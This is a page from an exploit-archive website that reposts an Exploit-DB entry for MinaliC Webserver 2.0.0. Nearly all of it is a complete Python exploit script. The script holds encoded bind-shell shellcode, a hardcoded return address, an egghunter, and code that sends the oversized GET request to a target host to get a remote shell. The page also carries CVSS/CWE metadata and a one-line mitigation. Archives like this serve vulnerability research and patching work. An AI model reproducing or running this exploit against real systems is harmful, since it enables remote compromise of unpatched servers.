Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
MinaliC Webserver buffer overflow (egghunter) - exploit.company
header-logo
Suggest Exploit
vendor:
MinaliC Webserver
by:
PuN1sh3r
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: MinaliC Webserver
Affected Version From: MinaliC Webserver 2.0.0
Affected Version To: MinaliC Webserver 2.0.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Pro SP3
2013

MinaliC Webserver buffer overflow (egghunter)

Remote command execution by triggering a buffer overflow in the GET request along with some buffer gymnastics using egghunters in order to attain a shell.

Mitigation:

Apply the latest patch or upgrade to a newer version of MinaliC Webserver.
Source

Exploit-DB raw data:

#!/usr/bin/env python
 
# Exploit Title: MinaliC Webserver buffer overflow (egghunter)
# Date: August 13 2013
# Exploit Author: PuN1sh3r 
# Email: luiguibiker@gmail.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP3, English
#
# Description:
# Remote command execution by triggering a buffer overflow in the GET 
# request along with some buffer gymnastics using egghunters in order to attain a shell .
# gr33zt to superkojiman for the initial exploit  
 
import socket
# windows/shell_bind_tcp  http://www.metasploit.com
# * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=process,InitialAutoRunScript=, AutoRunScript=

shellcode = (
"\x89\xe7\xda\xc0\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x49\x78\x6b\x39\x37\x70\x33\x30\x77\x70\x43\x50\x4d"
"\x59\x38\x65\x44\x71\x6b\x62\x73\x54\x6e\x6b\x61\x42\x34\x70"
"\x4c\x4b\x43\x62\x74\x4c\x6c\x4b\x36\x32\x56\x74\x4c\x4b\x72"
"\x52\x75\x78\x44\x4f\x68\x37\x70\x4a\x67\x56\x66\x51\x4b\x4f"
"\x34\x71\x4b\x70\x4c\x6c\x55\x6c\x61\x71\x51\x6c\x63\x32\x76"
"\x4c\x77\x50\x4b\x71\x4a\x6f\x34\x4d\x47\x71\x58\x47\x5a\x42"
"\x58\x70\x70\x52\x33\x67\x4c\x4b\x53\x62\x52\x30\x4e\x6b\x30"
"\x42\x65\x6c\x57\x71\x68\x50\x4c\x4b\x77\x30\x62\x58\x6d\x55"
"\x49\x50\x71\x64\x30\x4a\x56\x61\x5a\x70\x42\x70\x4c\x4b\x52"
"\x68\x66\x78\x6c\x4b\x42\x78\x45\x70\x56\x61\x6a\x73\x79\x73"
"\x35\x6c\x77\x39\x4c\x4b\x77\x44\x6c\x4b\x76\x61\x4e\x36\x65"
"\x61\x6b\x4f\x34\x71\x69\x50\x4e\x4c\x7a\x61\x38\x4f\x54\x4d"
"\x63\x31\x4a\x67\x76\x58\x79\x70\x34\x35\x6a\x54\x55\x53\x61"
"\x6d\x7a\x58\x35\x6b\x61\x6d\x31\x34\x43\x45\x58\x62\x30\x58"
"\x4c\x4b\x73\x68\x44\x64\x47\x71\x6e\x33\x62\x46\x4c\x4b\x66"
"\x6c\x30\x4b\x4e\x6b\x32\x78\x55\x4c\x63\x31\x48\x53\x4c\x4b"
"\x63\x34\x4e\x6b\x75\x51\x38\x50\x4b\x39\x62\x64\x61\x34\x71"
"\x34\x61\x4b\x63\x6b\x61\x71\x63\x69\x53\x6a\x76\x31\x59\x6f"
"\x4d\x30\x33\x68\x31\x4f\x30\x5a\x4c\x4b\x37\x62\x48\x6b\x4d"
"\x56\x63\x6d\x53\x58\x36\x53\x70\x32\x73\x30\x57\x70\x32\x48"
"\x74\x37\x71\x63\x37\x42\x33\x6f\x43\x64\x73\x58\x30\x4c\x61"
"\x67\x45\x76\x76\x67\x79\x6f\x58\x55\x38\x38\x6e\x70\x65\x51"
"\x63\x30\x33\x30\x57\x59\x4b\x74\x31\x44\x76\x30\x51\x78\x54"
"\x69\x4f\x70\x52\x4b\x33\x30\x6b\x4f\x79\x45\x56\x30\x32\x70"
"\x76\x30\x56\x30\x43\x70\x56\x30\x53\x70\x36\x30\x51\x78\x49"
"\x7a\x54\x4f\x59\x4f\x79\x70\x4b\x4f\x4a\x75\x6d\x59\x6b\x77"
"\x54\x71\x4b\x6b\x76\x33\x65\x38\x76\x62\x73\x30\x45\x51\x4d"
"\x6b\x4c\x49\x4a\x46\x53\x5a\x64\x50\x71\x46\x50\x57\x52\x48"
"\x68\x42\x4b\x6b\x34\x77\x65\x37\x4b\x4f\x4e\x35\x33\x63\x42"
"\x77\x35\x38\x38\x37\x6b\x59\x44\x78\x6b\x4f\x49\x6f\x6e\x35"
"\x33\x63\x73\x63\x50\x57\x65\x38\x64\x34\x7a\x4c\x45\x6b\x6d"
"\x31\x59\x6f\x79\x45\x61\x47\x6e\x69\x6a\x67\x65\x38\x70\x75"
"\x52\x4e\x62\x6d\x63\x51\x79\x6f\x48\x55\x51\x78\x53\x53\x42"
"\x4d\x51\x74\x65\x50\x6e\x69\x6a\x43\x36\x37\x53\x67\x53\x67"
"\x50\x31\x39\x66\x50\x6a\x45\x42\x62\x79\x43\x66\x48\x62\x59"
"\x6d\x72\x46\x78\x47\x37\x34\x37\x54\x47\x4c\x33\x31\x65\x51"
"\x4e\x6d\x57\x34\x64\x64\x54\x50\x59\x56\x57\x70\x70\x44\x33"
"\x64\x70\x50\x73\x66\x61\x46\x33\x66\x67\x36\x53\x66\x50\x4e"
"\x42\x76\x43\x66\x72\x73\x56\x36\x62\x48\x71\x69\x48\x4c\x45"
"\x6f\x6d\x56\x59\x6f\x78\x55\x4c\x49\x49\x70\x42\x6e\x30\x56"
"\x47\x36\x59\x6f\x66\x50\x72\x48\x63\x38\x4d\x57\x65\x4d\x33"
"\x50\x6b\x4f\x4e\x35\x4d\x6b\x48\x70\x48\x35\x4f\x52\x63\x66"
"\x72\x48\x4f\x56\x4c\x55\x6d\x6d\x4f\x6d\x39\x6f\x5a\x75\x57"
"\x4c\x33\x36\x71\x6c\x37\x7a\x4d\x50\x79\x6b\x59\x70\x72\x55"
"\x54\x45\x4d\x6b\x43\x77\x55\x43\x72\x52\x42\x4f\x61\x7a\x57"
"\x70\x36\x33\x49\x6f\x5a\x75\x41\x41"
)
# Return addres Note:
# 77C11F13  JMP EBX on msvcrt.dll Windows XP SP3 English
ret = "\x13\x1F\xC1\x77" 
junk = "\x41" *  245 + ret
host = "\x90" * 30 + "A" * 40  + "\x90" * 31

egg =  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 
buf = "GET /" + junk + " HTTP/1.1\r\n" + "Host: " + "\x90" * (100 - len(egg)) + egg     + "\r\n"
buf += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf += "User-Agent: " + "T00W" + "T00W" +  "\x90" * (900 - len(shellcode)) + shellcode  + "\r\n\r\n" 
print buf
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.5", 8080))
s.send(buf)

Navigation

Suggest Exploit

Services By CQR